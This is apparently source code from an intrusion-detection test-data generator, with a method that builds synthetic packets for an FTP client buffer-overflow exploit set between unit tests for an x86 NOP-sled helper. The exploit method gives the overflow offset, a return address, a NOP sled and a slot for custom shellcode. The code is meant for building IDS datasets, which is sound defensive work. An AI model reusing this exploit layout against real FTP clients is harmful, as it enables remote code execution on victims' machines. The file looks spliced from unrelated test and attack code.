def test_get_rnd_x86_nop_with_sideeffects(self):
result = Utility.get_rnd_x86_nop(1000, False)
for i in range(0, len(result)):
with self.subTest(i=i):
self.assertTrue(
result[i].to_bytes(1, "little") in Utility.x86_nops or
result[i].to_bytes(1, "little") in Utility.x86_pseudo_nops)
def test_get_rnd_x86_nop_without_sideeffects(self):
result = Utility.get_rnd_x86_nop(1000, True)
for i in range(0, len(result)):
with self.subTest(i=i):
self.assertIn(result[i].to_bytes(1, "little"),
Utility.x86_nops)
self.assertNotIn(result[i].to_bytes(1, "little"),
Utility.x86_pseudo_nops)
def generate_attack_packets(self):
"""
Creates the attack packets.
"""
pps = self.get_param_value(atkParam.Parameter.PACKETS_PER_SECOND)
# Timestamp
timestamp_next_pkt = self.get_param_value(
atkParam.Parameter.INJECT_AT_TIMESTAMP)
# store start time of attack
self.attack_start_utime = timestamp_next_pkt
# Initialize parameters
ip_victim = self.get_param_value(atkParam.Parameter.IP_SOURCE)
ip_attacker = self.get_param_value(atkParam.Parameter.IP_DESTINATION)
mac_victim = self.get_param_value(atkParam.Parameter.MAC_SOURCE)
mac_attacker = self.get_param_value(atkParam.Parameter.MAC_DESTINATION)
custom_payload = self.get_param_value(
atkParam.Parameter.CUSTOM_PAYLOAD)
custom_payload_len = len(custom_payload)
custom_payload_limit = 1000
Util.check_payload_len(custom_payload_len, custom_payload_limit)
self.packets = []
# Create random victim if specified
if self.get_param_value(atkParam.Parameter.IP_SOURCE_RANDOMIZE):
# The most used IP class in background traffic
most_used_ip_class = Util.handle_most_used_outputs(
self.statistics.get_most_used_ip_class())
ip_victim = self.generate_random_ipv4_address(
most_used_ip_class, 1)
mac_victim = self.generate_random_mac_address()
# Get MSS, TTL and Window size value for victim/attacker IP
victim_mss_value, victim_ttl_value, victim_win_value = self.get_ip_data(
ip_victim)
attacker_mss_value, attacker_ttl_value, attacker_win_value = self.get_ip_data(
ip_attacker)
min_delay, max_delay = self.get_reply_delay(ip_attacker)
attacker_seq = rnd.randint(1000, 50000)
victim_seq = rnd.randint(1000, 50000)
sport = Util.generate_source_port_from_platform("win7")
# connection request from victim (client)
victim_ether = inet.Ether(src=mac_victim, dst=mac_attacker)
victim_ip = inet.IP(src=ip_victim,
dst=ip_attacker,
ttl=victim_ttl_value,
flags='DF')
request_tcp = inet.TCP(sport=sport,
dport=ftp_port,
window=victim_win_value,
flags='S',
seq=victim_seq,
options=[('MSS', victim_mss_value)])
victim_seq += 1
syn = (victim_ether / victim_ip / request_tcp)
syn.time = timestamp_next_pkt
timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps,
min_delay)
self.packets.append(syn)
# response from attacker (server)
attacker_ether = inet.Ether(src=mac_attacker, dst=mac_victim)
attacker_ip = inet.IP(src=ip_attacker,
dst=ip_victim,
ttl=attacker_ttl_value,
flags='DF')
reply_tcp = inet.TCP(sport=ftp_port,
dport=sport,
seq=attacker_seq,
ack=victim_seq,
flags='SA',
window=attacker_win_value,
options=[('MSS', attacker_mss_value)])
attacker_seq += 1
synack = (attacker_ether / attacker_ip / reply_tcp)
synack.time = timestamp_next_pkt
timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps,
min_delay)
self.packets.append(synack)
# acknowledgement from victim (client)
ack_tcp = inet.TCP(sport=sport,
dport=ftp_port,
seq=victim_seq,
ack=attacker_seq,
flags='A',
window=victim_win_value,
options=[('MSS', victim_mss_value)])
ack = (victim_ether / victim_ip / ack_tcp)
ack.time = timestamp_next_pkt
timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps)
self.packets.append(ack)
# FTP exploit packet
ftp_tcp = inet.TCP(sport=ftp_port,
dport=sport,
seq=attacker_seq,
ack=victim_seq,
flags='PA',
window=attacker_win_value,
options=[('MSS', attacker_mss_value)])
characters = b'220'
characters += Util.get_rnd_bytes(2065, Util.forbidden_chars)
characters += b'\x96\x72\x01\x68'
characters += Util.get_rnd_x86_nop(10, False, Util.forbidden_chars)
custom_payload_file = self.get_param_value(
atkParam.Parameter.CUSTOM_PAYLOAD_FILE)
# Generation of payload of the FTP exploit packet
if custom_payload == '':
if custom_payload_file == '':
payload = Util.get_rnd_bytes(custom_payload_limit,
Util.forbidden_chars)
else:
payload = ID2TLib.Utility.get_bytes_from_file(
custom_payload_file)
Util.check_payload_len(len(payload), custom_payload_limit)
payload += Util.get_rnd_x86_nop(
custom_payload_limit - len(payload), False,
Util.forbidden_chars)
else:
encoded_payload = custom_payload.encode()
payload = Util.get_rnd_x86_nop(
custom_payload_limit - custom_payload_len, False,
Util.forbidden_chars)
payload += encoded_payload
characters += payload
characters += Util.get_rnd_x86_nop(20, False, Util.forbidden_chars)
characters += b'\r\n'
ftp_tcp.add_payload(characters)
ftp_buff = (attacker_ether / attacker_ip / ftp_tcp)
ftp_buff.time = timestamp_next_pkt
timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps)
self.packets.append(ftp_buff)
attacker_seq += len(ftp_tcp.payload)
# Fin Ack from attacker
fin_ack_tcp = inet.TCP(sport=ftp_port,
dport=sport,
seq=attacker_seq,
ack=victim_seq,
flags='FA',
window=attacker_win_value,
options=[('MSS', attacker_mss_value)])
fin_ack = (attacker_ether / attacker_ip / fin_ack_tcp)
fin_ack.time = timestamp_next_pkt
timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps,
min_delay)
self.packets.append(fin_ack)
# Ack from victim on FTP packet
ftp_ack_tcp = inet.TCP(sport=sport,
dport=ftp_port,
seq=victim_seq,
ack=attacker_seq,
flags='A',
window=victim_win_value,
options=[('MSS', victim_mss_value)])
ftp_ack = (victim_ether / victim_ip / ftp_ack_tcp)
ftp_ack.time = timestamp_next_pkt
timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps)
self.packets.append(ftp_ack)
# Ack from victim on Fin/Ack of attacker
fin_ack_ack_tcp = inet.TCP(sport=sport,
dport=ftp_port,
seq=victim_seq,
ack=attacker_seq + 1,
flags='A',
window=victim_win_value,
options=[('MSS', victim_mss_value)])
fin_ack_ack = (victim_ether / victim_ip / fin_ack_ack_tcp)
fin_ack_ack.time = timestamp_next_pkt
self.packets.append(fin_ack_ack)
def test_get_rnd_x86_nop_single_filter(self):
result = Utility.get_rnd_x86_nop(1000, False, b'\x20')
for i in range(0, len(result)):
with self.subTest(i=i):
self.assertNotEqual(result[i].to_bytes(1, "little"), b'\x20')
def test_get_rnd_x86_nop_filter(self):
result = Utility.get_rnd_x86_nop(1000, False, Utility.x86_nops.copy())
for i in range(0, len(result)):
with self.subTest(i=i):
self.assertNotIn(result[i].to_bytes(1, "little"),
Utility.x86_nops)
def test_get_rnd_x86_nop_len(self):
result = Utility.get_rnd_x86_nop(1000)
self.assertEqual(len(result), 1000)